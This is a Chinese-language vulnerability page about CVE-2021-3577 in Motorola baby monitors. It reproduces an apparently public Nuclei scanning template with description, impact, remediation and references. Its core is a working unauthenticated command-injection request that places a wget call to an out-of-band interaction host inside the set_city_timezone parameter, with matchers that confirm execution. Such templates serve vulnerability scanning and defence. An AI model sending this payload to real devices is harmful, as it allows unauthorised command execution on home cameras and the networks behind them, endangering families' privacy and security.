CVE-2021-3577: Motorola Baby Monitors - Remote Command Execution

日期: 2025-08-01 | 影响软件: Motorola Baby Monitors | POC: 已公开

漏洞描述

Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.

PoC代码[已公开]

id: CVE-2021-3577

info:
  name: Motorola Baby Monitors - Remote Command Execution
  author: gy741
  severity: high
  description: Motorola Baby Monitors contains multiple interface vulnerabilities could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device, potentially leading to unauthorized access, data theft, or further compromise of the network.
  remediation: |
    Apply the latest firmware update provided by Motorola to mitigate the vulnerability and ensure the device is not accessible from untrusted networks.
  reference:
    - https://randywestergren.com/unauthenticated-remote-code-execution-in-motorola-baby-monitors/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3577
    - https://binatoneglobal.com/security-advisory/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-3577
    cwe-id: CWE-863,CWE-78
    epss-score: 0.86428
    epss-percentile: 0.99372
    cpe: cpe:2.3:o:binatoneglobal:halo\+_camera_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: binatoneglobal
    product: halo\+_camera_firmware
  tags: cve2021,cve,rce,oast,motorola,iot,binatoneglobal

http:
  - raw:
      - |
        GET /?action=command&command=set_city_timezone&value=$(wget%20http://{{interactsh-url}})) HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        words:
          - "set_city_timezone"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220413e4a3683b5d34bbb474a1f4b3b6e308a7076029bef4a78733d341a509bcc63022100b7cdf374f7b6da71e92524da36f3ed3f1429926cb6ef23fe8fc9d9933cc94edc:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-3577.yaml